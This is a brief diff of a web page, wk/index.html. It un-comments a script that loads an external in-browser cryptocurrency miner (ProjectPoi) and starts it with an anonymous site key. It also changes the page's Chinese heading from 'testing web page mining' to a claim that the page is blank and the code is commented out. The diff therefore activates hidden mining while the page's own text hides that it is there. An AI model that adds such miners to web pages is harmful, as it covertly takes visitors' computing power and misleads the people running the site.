--- a/wk/index.html
+++ b/wk/index.html
@@ -2,7 +2,7 @@
 <html>
 	<head>
 		<meta charset="UTF-8">
-		<!--<script src="https://ppoi.org/lib/projectpoi.min.js"></script>
+		<script src="https://ppoi.org/lib/projectpoi.min.js"></script>
 		
 		<script>
 	var miner = new ProjectPoi.Anonymous('BLuRXQ2XBPG0jSEBBnysmfVJ');
@@ -22,12 +22,12 @@
 
 		// Output to HTML elements...
 	}, 1000);
-</script>-->
+</script>
 
 
 		<title></title>
 	</head>
 	<body>
-		<h>测试网页挖矿</h>
+		<h>这是一个空白页，注释掉</h>
 	</body>
 </html>
